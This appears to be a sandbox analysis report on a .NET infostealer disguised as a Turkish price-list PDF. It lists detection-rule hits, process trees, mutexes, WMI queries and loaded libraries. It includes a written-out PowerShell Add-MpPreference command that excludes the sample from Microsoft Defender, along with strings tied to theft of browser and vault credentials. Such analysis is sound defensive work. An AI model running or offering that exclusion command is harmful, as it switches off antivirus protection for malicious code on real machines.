                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_065511F08_2_065511F0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_06552D988_2_06552D98
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_065522B08_2_065522B0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_06557FA28_2_06557FA2
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_06557FA88_2_06557FA8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_02F6CC688_2_02F6CC68
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_00FCDE4C10_2_00FCDE4C
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_0709398810_2_07093988
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_0139963811_2_01399638
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_0139C98011_2_0139C980
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_01394AA811_2_01394AA8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_01393E9011_2_01393E90
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_013941D811_2_013941D8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_0639044811_2_06390448
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_06396C6C11_2_06396C6C
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_06392D9811_2_06392D98
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_063922B011_2_063922B0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_06397FA811_2_06397FA8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_06397FA311_2_06397FA3
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_06398C9711_2_06398C97
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_0139CC6811_2_0139CC68
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000000.1666699317.0000000001060000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameoAlZ.exeD vs 26.09 01.10.2024Fiyat Listesi.pdf.exe
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708918673.0000000007C30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 26.09 01.10.2024Fiyat Listesi.pdf.exe
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1704110218.000000000165E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 26.09 01.10.2024Fiyat Listesi.pdf.exe
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1705533859.0000000004399000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename24eacbb4-825a-4768-ad59-21c6c6ffb60d.exe4 vs 26.09 01.10.2024Fiyat Listesi.pdf.exe
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1705533859.0000000004605000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 26.09 01.10.2024Fiyat Listesi.pdf.exe
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1705109897.00000000033E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename24eacbb4-825a-4768-ad59-21c6c6ffb60d.exe4 vs 26.09 01.10.2024Fiyat Listesi.pdf.exe
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4134637455.0000000000AF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 26.09 01.10.2024Fiyat Listesi.pdf.exe
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exeBinary or memory string: OriginalFilenameoAlZ.exeD vs 26.09 01.10.2024Fiyat Listesi.pdf.exe
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: ctsdvwT.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, ZTFEpdjP8zw.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, WnRNxU.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, 2njIk.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, I5ElxL.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, QQSiOsa4hPS.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, FdHU4eb83Z7.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, GfC7QCCjIwYVW1JcP5.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, GfC7QCCjIwYVW1JcP5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, GfC7QCCjIwYVW1JcP5.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, GfC7QCCjIwYVW1JcP5.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, GfC7QCCjIwYVW1JcP5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, GfC7QCCjIwYVW1JcP5.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, jvk3pjvyguvOKtNTem.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, jvk3pjvyguvOKtNTem.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/9@1/1
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\26.09 01.10.2024Fiyat Listesi.pdf.exe.logJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMutant created: NULL
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMutant created: \Sessions\1\BaseNamedObjects\DBKvNAWttOuDYjyLzkXI
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2dsa5nlh.01c.ps1Jump to behavior
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.1894805275.0000000003250000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000B.00000002.4141088444.0000000003000000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exeReversingLabs: Detection: 28%
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeFile read: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess created: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess created: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dllJump to behavior
